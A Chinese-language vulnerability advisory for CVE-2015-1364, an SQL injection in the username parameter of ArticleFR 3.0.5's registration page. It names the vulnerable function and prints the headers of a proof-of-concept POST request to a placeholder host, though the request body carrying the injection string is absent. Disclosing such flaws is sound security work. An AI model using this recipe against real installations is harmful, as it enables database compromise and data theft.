ArticleFR 'username'参数SQL注入漏洞
发布日期:2015-02-03
更新日期:2015-02-05
受影响系统:ArticleFR ArticleFR 3.0.5
描述:
BUGTRAQ ID:
72469
CVE(CAN) ID:
CVE-2015-1364
ArticleFR是文章目录及内容目录系统。
ArticleFR 3.0.5及其他版本中,system/profile.functions.php的getProfile函数存在sql注入漏洞,远程攻击者通过register/的用户名参数,利用此漏洞可执行任意sql命令。
<*来源:Tran Dinh Tien
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
POST /articlefr/register/ HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101
Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://target.org/articlefr/register/
Cookie: _ga=GA1.2.884814947.1419214773;
__unam=bd22dea-14a6fcadd31-42cba495-31; GEAR=local-5422433b500446ead50002d4;
PHPSESSID=8a9r8t1d5g9veogj6er9fvev63; _gat=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 103
建议:
厂商补丁:
ArticleFR
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://sourceforge.net/projects/freereprintables/浏览次数:2381
严重程度:0(网友投票)
